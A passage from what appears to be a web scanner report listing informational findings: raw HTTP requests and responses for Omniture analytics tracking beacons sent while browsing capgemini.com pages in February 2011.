Cookie: s_vi_hddx60mexxx7Fdyn=[CS]v4|26B089AF05161C88-6000018280340219|4D61135D[CE]; s_vi_x7Dmx7Cgx7Ex7Ex7Dhaajmac=[CS]v4|26B08A8405161367-60000182C010AD84|4D611507[CE]; s_vi_x7Fox7Eex7Cx7Cx7Fjcchx3E=[CS]v4|26B08A9B05012A5C-600001058002D0CE|4D611534[CE]; s_vi_fvgx7Ceefvzzx7Ex7Cx7Brvx7Dtx7Bx7Bpy=[CS]v4|26B08B0B0515A83A-60000170E002473D|4D611615[CE]; s_vi_brcxxaabwx7Ex7Eux7Ftex7Ftf=[CS]v4|26B0882E85013EE2-4000011300003B32|4D6133AD[CE]; s_vi_brcxxaabwx7Ex7Euvx7Dx7Espx7D=[CS]v4|26B0882E85013EE2-4000011300003B36|4D6133AD[CE]; s_vi_djbjfni=[CS]v4|26B1E6568516110F-600001A22005DD5C|4D63CCAC[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26B4C61605010DDC-4000010DA0030A5A|4D698A26[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26B4C51405012F9D-6000010720241BA0|4D698A26[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26B4C51405012F9D-6000010720241BA3|4D698A26[CE]; s_vi_px7Dx7Epx7Dx7Epx7Dx7Ex7Dx7Cozjvvwupwx7Cx2Bx29x28x29=[CS]v4|26B5D066050116F7-4000010C00002CBB|4D6BA0CB[CE]; s_vi_qsbuwx7Fx7Bx7Cx7Bqx7Dx7Fux7Ex7Dpsx7E=[CS]v4|26B5F02705011A74-6000010E6043A45F|4D6BE04C[CE]; s_vi_omx7Ckiaebeoca=[CS]v4|26B5F02705011A74-6000010E6043A461|4D6BE04C[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 17:57:06 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_qsbuwx7Fx7Bx7Cx7Bqx7Dx7Fux7Ex7Dpsx7E=[CS]v4|26B5F02705011A74-6000010E6043A45F|4D6BE04C[CE]; Expires=Sat, 27 Feb 2016 17:57:06 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_omx7Ckiaebeoca=[CS]v4|26B5F02705011A74-6000010E6043A461|4D6BE04C[CE]; Expires=Sat, 27 Feb 2016 17:57:06 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.3.1
Expires: Sun, 27 Feb 2011 17:57:06 GMT
Last-Modified: Tue, 01 Mar 2011 17:57:06 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4D6BE1F2-40BB-205EA3E9"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www8
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

7.237. http://capgeminicomglobal.112.2o7.net/b/ss/capgeminicomglobal,capgeminicom/1/H.17/s96224887147545  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://capgeminicomglobal.112.2o7.net
Path:   /b/ss/capgeminicomglobal,capgeminicom/1/H.17/s96224887147545

Request

GET /b/ss/capgeminicomglobal,capgeminicom/1/H.17/s96224887147545?AQB=1&pccr=true&&ndh=1&t=28/1/2011%2011%3A50%3A7%201%20360&pageName=Collaborative%20Business%20Experience&g=http%3A//www.capgemini.com/&h1=Home&h2=Home&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1116&bh=939&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BWPI%20Detector%201.3%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: capgeminicomglobal.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.capgemini.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_hddx60mexxx7Fdyn=[CS]v4|26B089AF05161C88-6000018280340219|4D61135D[CE]; s_vi_x7Dmx7Cgx7Ex7Ex7Dhaajmac=[CS]v4|26B08A8405161367-60000182C010AD84|4D611507[CE]; s_vi_x7Fox7Eex7Cx7Cx7Fjcchx3E=[CS]v4|26B08A9B05012A5C-600001058002D0CE|4D611534[CE]; s_vi_fvgx7Ceefvzzx7Ex7Cx7Brvx7Dtx7Bx7Bpy=[CS]v4|26B08B0B0515A83A-60000170E002473D|4D611615[CE]; s_vi_brcxxaabwx7Ex7Eux7Ftex7Ftf=[CS]v4|26B0882E85013EE2-4000011300003B32|4D6133AD[CE]; s_vi_brcxxaabwx7Ex7Euvx7Dx7Espx7D=[CS]v4|26B0882E85013EE2-4000011300003B36|4D6133AD[CE]; s_vi_djbjfni=[CS]v4|26B1E6568516110F-600001A22005DD5C|4D63CCAC[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26B4C61605010DDC-4000010DA0030A5A|4D698A26[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26B4C51405012F9D-6000010720241BA0|4D698A26[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26B4C51405012F9D-6000010720241BA3|4D698A26[CE]; s_vi_px7Dx7Epx7Dx7Epx7Dx7Ex7Dx7Cozjvvwupwx7Cx2Bx29x28x29=[CS]v4|26B5D066050116F7-4000010C00002CBB|4D6BA0CB[CE]; s_vi_qsbuwx7Fx7Bx7Cx7Bqx7Dx7Fux7Ex7Dpsx7E=[CS]v4|0-0|4D6BE04C[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 17:50:06 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_qsbuwx7Fx7Bx7Cx7Bqx7Dx7Fux7Ex7Dpsx7E=[CS]v4|26B5F02705012384-60000102600F13F5|4D6BE04C[CE]; Expires=Sat, 27 Feb 2016 17:50:06 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_omx7Ckiaebeoca=[CS]v4|26B5F02705012384-60000102600F13F7|4D6BE04C[CE]; Expires=Sat, 27 Feb 2016 17:50:06 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.3.1
Expires: Sun, 27 Feb 2011 17:50:06 GMT
Last-Modified: Tue, 01 Mar 2011 17:50:06 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4D6BE04E-46FC-2D61FB54"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www19
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

7.238. http://capgeminicomglobal.112.2o7.net/b/ss/capgeminicomglobal,capgeminicom/1/H.17/s96921465278137  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://capgeminicomglobal.112.2o7.net
Path:   /b/ss/capgeminicomglobal,capgeminicom/1/H.17/s96921465278137

Request

GET /b/ss/capgeminicomglobal,capgeminicom/1/H.17/s96921465278137?AQB=1&ndh=1&t=28/1/2011%2011%3A56%3A10%201%20360&pageName=About%20Us&g=http%3A//www.capgemini.com/about/&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1116&bh=939&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BWPI%20Detector%201.3%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&pe=lnk_e&pev1=http%3A//www.capgemini.com/about/our_people/&pid=About%20Us&pidt=1&oid=http%3A//www.capgemini.com/about/our_people/&ot=A&AQE=1 HTTP/1.1
Host: capgeminicomglobal.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.capgemini.com/about/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_hddx60mexxx7Fdyn=[CS]v4|26B089AF05161C88-6000018280340219|4D61135D[CE]; s_vi_x7Dmx7Cgx7Ex7Ex7Dhaajmac=[CS]v4|26B08A8405161367-60000182C010AD84|4D611507[CE]; s_vi_x7Fox7Eex7Cx7Cx7Fjcchx3E=[CS]v4|26B08A9B05012A5C-600001058002D0CE|4D611534[CE]; s_vi_fvgx7Ceefvzzx7Ex7Cx7Brvx7Dtx7Bx7Bpy=[CS]v4|26B08B0B0515A83A-60000170E002473D|4D611615[CE]; s_vi_brcxxaabwx7Ex7Eux7Ftex7Ftf=[CS]v4|26B0882E85013EE2-4000011300003B32|4D6133AD[CE]; s_vi_brcxxaabwx7Ex7Euvx7Dx7Espx7D=[CS]v4|26B0882E85013EE2-4000011300003B36|4D6133AD[CE]; s_vi_djbjfni=[CS]v4|26B1E6568516110F-600001A22005DD5C|4D63CCAC[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26B4C61605010DDC-4000010DA0030A5A|4D698A26[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26B4C51405012F9D-6000010720241BA0|4D698A26[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26B4C51405012F9D-6000010720241BA3|4D698A26[CE]; s_vi_px7Dx7Epx7Dx7Epx7Dx7Ex7Dx7Cozjvvwupwx7Cx2Bx29x28x29=[CS]v4|26B5D066050116F7-4000010C00002CBB|4D6BA0CB[CE]; s_vi_qsbuwx7Fx7Bx7Cx7Bqx7Dx7Fux7Ex7Dpsx7E=[CS]v4|26B5F02705011A74-6000010E6043A45F|4D6BE04C[CE]; s_vi_omx7Ckiaebeoca=[CS]v4|26B5F02705011A74-6000010E6043A461|4D6BE04C[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 17:56:07 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_qsbuwx7Fx7Bx7Cx7Bqx7Dx7Fux7Ex7Dpsx7E=[CS]v4|26B5F02705011A74-6000010E6043A45F|4D6BE04C[CE]; Expires=Sat, 27 Feb 2016 17:56:07 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_omx7Ckiaebeoca=[CS]v4|26B5F02705011A74-6000010E6043A461|4D6BE04C[CE]; Expires=Sat, 27 Feb 2016 17:56:07 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.3.1
Expires: Sun, 27 Feb 2011 17:56:07 GMT
Last-Modified: Tue, 01 Mar 2011 17:56:07 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4D6BE1B7-5B7F-017EE26A"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www144
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

7.239. http://capgeminicomglobal.112.2o7.net/b/ss/capgeminicomglobal,capgeminicom/1/H.17/s96949669870082  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://capgeminicomglobal.112.2o7.net
Path:   /b/ss/capgeminicomglobal,capgeminicom/1/H.17/s96949669870082

Request

GET /b/ss/capgeminicomglobal,capgeminicom/1/H.17/s96949669870082?AQB=1&ndh=1&t=28/1/2011%2011%3A51%3A44%201%20360&pageName=Careers%20at%20Capgemini%20-%20Overview&g=http%3A//www.capgemini.com/careers/overview/&h1=Home%7CCareers%20With%20Us%7COverview&v2=/careers/overview/&h2=Home%7CCareers%20With%20Us%7COverview&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1116&bh=939&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BWPI%20Detector%201.3%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: capgeminicomglobal.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.capgemini.com/careers/overview/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_hddx60mexxx7Fdyn=[CS]v4|26B089AF05161C88-6000018280340219|4D61135D[CE]; s_vi_x7Dmx7Cgx7Ex7Ex7Dhaajmac=[CS]v4|26B08A8405161367-60000182C010AD84|4D611507[CE]; s_vi_x7Fox7Eex7Cx7Cx7Fjcchx3E=[CS]v4|26B08A9B05012A5C-600001058002D0CE|4D611534[CE]; s_vi_fvgx7Ceefvzzx7Ex7Cx7Brvx7Dtx7Bx7Bpy=[CS]v4|26B08B0B0515A83A-60000170E002473D|4D611615[CE]; s_vi_brcxxaabwx7Ex7Eux7Ftex7Ftf=[CS]v4|26B0882E85013EE2-4000011300003B32|4D6133AD[CE]; s_vi_brcxxaabwx7Ex7Euvx7Dx7Espx7D=[CS]v4|26B0882E85013EE2-4000011300003B36|4D6133AD[CE]; s_vi_djbjfni=[CS]v4|26B1E6568516110F-600001A22005DD5C|4D63CCAC[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26B4C61605010DDC-4000010DA0030A5A|4D698A26[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26B4C51405012F9D-6000010720241BA0|4D698A26[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26B4C51405012F9D-6000010720241BA3|4D698A26[CE]; s_vi_px7Dx7Epx7Dx7Epx7Dx7Ex7Dx7Cozjvvwupwx7Cx2Bx29x28x29=[CS]v4|26B5D066050116F7-4000010C00002CBB|4D6BA0CB[CE]; s_vi_qsbuwx7Fx7Bx7Cx7Bqx7Dx7Fux7Ex7Dpsx7E=[CS]v4|26B5F02705011A74-6000010E6043A45F|4D6BE04C[CE]; s_vi_omx7Ckiaebeoca=[CS]v4|26B5F02705011A74-6000010E6043A461|4D6BE04C[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 17:51:42 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_qsbuwx7Fx7Bx7Cx7Bqx7Dx7Fux7Ex7Dpsx7E=[CS]v4|26B5F02705011A74-6000010E6043A45F|4D6BE04C[CE]; Expires=Sat, 27 Feb 2016 17:51:42 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_omx7Ckiaebeoca=[CS]v4|26B5F02705011A74-6000010E6043A461|4D6BE04C[CE]; Expires=Sat, 27 Feb 2016 17:51:42 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.3.1
Expires: Sun, 27 Feb 2011 17:51:42 GMT
Last-Modified: Tue, 01 Mar 2011 17:51:42 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4D6BE0AE-2491-737A99EB"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www163
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

7.240. http://capgeminicomglobal.112.2o7.net/b/ss/capgeminicomglobal,capgeminicom/1/H.17/s97269068704918  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://capgeminicomglobal.112.2o7.net
Path:   /b/ss/capgeminicomglobal,capgeminicom/1/H.17/s97269068704918

Request

GET /b/ss/capgeminicomglobal,capgeminicom/1/H.17/s97269068704918?AQB=1&ndh=1&t=28/1/2011%2011%3A53%3A29%201%20360&pageName=Insights%20%26%20Resources&g=http%3A//www.capgemini.com/insights-and-resources/&r=http%3A//www.capgemini.com/investor/welcome/&ch=Insights%20%26%20Resources&c1=Insights%20%26%20Resources&h1=Home%7CInsights%20%26%20Resources&v2=/insights-and-resources/&h2=Home%7CInsights%20%26%20Resources&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1116&bh=939&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BWPI%20Detector%201.3%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: capgeminicomglobal.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.capgemini.com/insights-and-resources/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_hddx60mexxx7Fdyn=[CS]v4|26B089AF05161C88-6000018280340219|4D61135D[CE]; s_vi_x7Dmx7Cgx7Ex7Ex7Dhaajmac=[CS]v4|26B08A8405161367-60000182C010AD84|4D611507[CE]; s_vi_x7Fox7Eex7Cx7Cx7Fjcchx3E=[CS]v4|26B08A9B05012A5C-600001058002D0CE|4D611534[CE]; s_vi_fvgx7Ceefvzzx7Ex7Cx7Brvx7Dtx7Bx7Bpy=[CS]v4|26B08B0B0515A83A-60000170E002473D|4D611615[CE]; s_vi_brcxxaabwx7Ex7Eux7Ftex7Ftf=[CS]v4|26B0882E85013EE2-4000011300003B32|4D6133AD[CE]; s_vi_brcxxaabwx7Ex7Euvx7Dx7Espx7D=[CS]v4|26B0882E85013EE2-4000011300003B36|4D6133AD[CE]; s_vi_djbjfni=[CS]v4|26B1E6568516110F-600001A22005DD5C|4D63CCAC[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26B4C61605010DDC-4000010DA0030A5A|4D698A26[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26B4C51405012F9D-6000010720241BA0|4D698A26[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26B4C51405012F9D-6000010720241BA3|4D698A26[CE]; s_vi_px7Dx7Epx7Dx7Epx7Dx7Ex7Dx7Cozjvvwupwx7Cx2Bx29x28x29=[CS]v4|26B5D066050116F7-4000010C00002CBB|4D6BA0CB[CE]; s_vi_qsbuwx7Fx7Bx7Cx7Bqx7Dx7Fux7Ex7Dpsx7E=[CS]v4|26B5F02705011A74-6000010E6043A45F|4D6BE04C[CE]; s_vi_omx7Ckiaebeoca=[CS]v4|26B5F02705011A74-6000010E6043A461|4D6BE04C[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 17:53:26 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_qsbuwx7Fx7Bx7Cx7Bqx7Dx7Fux7Ex7Dpsx7E=[CS]v4|26B5F02705011A74-6000010E6043A45F|4D6BE04C[CE]; Expires=Sat, 27 Feb 2016 17:53:26 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_omx7Ckiaebeoca=[CS]v4|26B5F02705011A74-6000010E6043A461|4D6BE04C[CE]; Expires=Sat, 27 Feb 2016 17:53:26 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.3.1
Expires: Sun, 27 Feb 2011 17:53:26 GMT
Last-Modified: Tue, 01 Mar 2011 17:53:26 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4D6BE116-6F48-5C70217B"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www3
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

7.241. http://capgeminicomglobal.112.2o7.net/b/ss/capgeminicomglobal,capgeminicom/1/H.17/s98346089529804  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://capgeminicomglobal.112.2o7.net
Path:   /b/ss/capgeminicomglobal,capgeminicom/1/H.17/s98346089529804

Request

GET /b/ss/capgeminicomglobal,capgeminicom/1/H.17/s98346089529804?AQB=1&ndh=1&t=28/1/2011%2011%3A56%3A56%201%20360&pageName=Our%20People&g=http%3A//www.capgemini.com/about/our_people/&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1116&bh=939&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BWPI%20Detector%201.3%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&pe=lnk_e&pev1=http%3A//www.capgemini.com/contactus/&pid=Our%20People&pidt=1&oid=http%3A//www.capgemini.com/contactus/&ot=A&AQE=1 HTTP/1.1
Host: capgeminicomglobal.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.capgemini.com/about/our_people/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_hddx60mexxx7Fdyn=[CS]v4|26B089AF05161C88-6000018280340219|4D61135D[CE]; s_vi_x7Dmx7Cgx7Ex7Ex7Dhaajmac=[CS]v4|26B08A8405161367-60000182C010AD84|4D611507[CE]; s_vi_x7Fox7Eex7Cx7Cx7Fjcchx3E=[CS]v4|26B08A9B05012A5C-600001058002D0CE|4D611534[CE]; s_vi_fvgx7Ceefvzzx7Ex7Cx7Brvx7Dtx7Bx7Bpy=[CS]v4|26B08B0B0515A83A-60000170E002473D|4D611615[CE]; s_vi_brcxxaabwx7Ex7Eux7Ftex7Ftf=[CS]v4|26B0882E85013EE2-4000011300003B32|4D6133AD[CE]; s_vi_brcxxaabwx7Ex7Euvx7Dx7Espx7D=[CS]v4|26B0882E85013EE2-4000011300003B36|4D6133AD[CE]; s_vi_djbjfni=[CS]v4|26B1E6568516110F-600001A22005DD5C|4D63CCAC[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26B4C61605010DDC-4000010DA0030A5A|4D698A26[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26B4C51405012F9D-6000010720241BA0|4D698A26[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26B4C51405012F9D-6000010720241BA3|4D698A26[CE]; s_vi_px7Dx7Epx7Dx7Epx7Dx7Ex7Dx7Cozjvvwupwx7Cx2Bx29x28x29=[CS]v4|26B5D066050116F7-4000010C00002CBB|4D6BA0CB[CE]; s_vi_qsbuwx7Fx7Bx7Cx7Bqx7Dx7Fux7Ex7Dpsx7E=[CS]v4|26B5F02705011A74-6000010E6043A45F|4D6BE04C[CE]; s_vi_omx7Ckiaebeoca=[CS]v4|26B5F02705011A74-6000010E6043A461|4D6BE04C[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 17:56:52 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_qsbuwx7Fx7Bx7Cx7Bqx7Dx7Fux7Ex7Dpsx7E=[CS]v4|26B5F02705011A74-6000010E6043A45F|4D6BE04C[CE]; Expires=Sat, 27 Feb 2016 17:56:52 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_omx7Ckiaebeoca=[CS]v4|26B5F02705011A74-6000010E6043A461|4D6BE04C[CE]; Expires=Sat, 27 Feb 2016 17:56:52 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.3.1
Expires: Sun, 27 Feb 2011 17:56:52 GMT
Last-Modified: Tue, 01 Mar 2011 17:56:52 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4D6BE1E4-4D06-073C6DA0"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www68
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

7.242. http://capgeminicomglobal.112.2o7.net/b/ss/capgeminicomglobal,capgeminicom/1/H.17/s98501219481695  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://capgeminicomglobal.112.2o7.net
Path:   /b/ss/capgeminicomglobal,capgeminicom/1/H.17/s98501219481695

Request

GET /b/ss/capgeminicomglobal,capgeminicom/1/H.17/s98501219481695?AQB=1&ndh=1&t=28/1/2011%2011%3A56%3A7%201%20360&pageName=Technology%20Services&g=http%3A//www.capgemini.com/services-and-solutions/technology/&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1116&bh=939&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BWPI%20Detector%201.3%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&pe=lnk_e&pev1=http%3A//www.capgemini.com/about/&pid=Technology%20Services&pidt=1&oid=http%3A//www.capgemini.com/about/&ot=A&AQE=1 HTTP/1.1
Host: capgeminicomglobal.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.capgemini.com/services-and-solutions/technology/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_hddx60mexxx7Fdyn=[CS]v4|26B089AF05161C88-6000018280340219|4D61135D[CE]; s_vi_x7Dmx7Cgx7Ex7Ex7Dhaajmac=[CS]v4|26B08A8405161367-60000182C010AD84|4D611507[CE]; s_vi_x7Fox7Eex7Cx7Cx7Fjcchx3E=[CS]v4|26B08A9B05012A5C-600001058002D0CE|4D611534[CE]; s_vi_fvgx7Ceefvzzx7Ex7Cx7Brvx7Dtx7Bx7Bpy=[CS]v4|26B08B0B0515A83A-60000170E002473D|4D611615[CE]; s_vi_brcxxaabwx7Ex7Eux7Ftex7Ftf=[CS]v4|26B0882E85013EE2-4000011300003B32|4D6133AD[CE]; s_vi_brcxxaabwx7Ex7Euvx7Dx7Espx7D=[CS]v4|26B0882E85013EE2-4000011300003B36|4D6133AD[CE]; s_vi_djbjfni=[CS]v4|26B1E6568516110F-600001A22005DD5C|4D63CCAC[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26B4C61605010DDC-4000010DA0030A5A|4D698A26[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26B4C51405012F9D-6000010720241BA0|4D698A26[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26B4C51405012F9D-6000010720241BA3|4D698A26[CE]; s_vi_px7Dx7Epx7Dx7Epx7Dx7Ex7Dx7Cozjvvwupwx7Cx2Bx29x28x29=[CS]v4|26B5D066050116F7-4000010C00002CBB|4D6BA0CB[CE]; s_vi_qsbuwx7Fx7Bx7Cx7Bqx7Dx7Fux7Ex7Dpsx7E=[CS]v4|26B5F02705011A74-6000010E6043A45F|4D6BE04C[CE]; s_vi_omx7Ckiaebeoca=[CS]v4|26B5F02705011A74-6000010E6043A461|4D6BE04C[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 17:56:04 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_qsbuwx7Fx7Bx7Cx7Bqx7Dx7Fux7Ex7Dpsx7E=[CS]v4|26B5F02705011A74-6000010E6043A45F|4D6BE04C[CE]; Expires=Sat, 27 Feb 2016 17:56:04 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_omx7Ckiaebeoca=[CS]v4|26B5F02705011A74-6000010E6043A461|4D6BE04C[CE]; Expires=Sat, 27 Feb 2016 17:56:04 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.3.1
Expires: Sun, 27 Feb 2011 17:56:04 GMT
Last-Modified: Tue, 01 Mar 2011 17:56:04 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4D6BE1B4-0173-643A1CB4"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www57
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

7.243. http://capgeminicomglobal.112.2o7.net/b/ss/capgeminicomglobal,capgeminicom/1/H.17/s98762076739221  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://capgeminicomglobal.112.2o7.net
Path:   /b/ss/capgeminicomglobal,capgeminicom/1/H.17/s98762076739221

Request

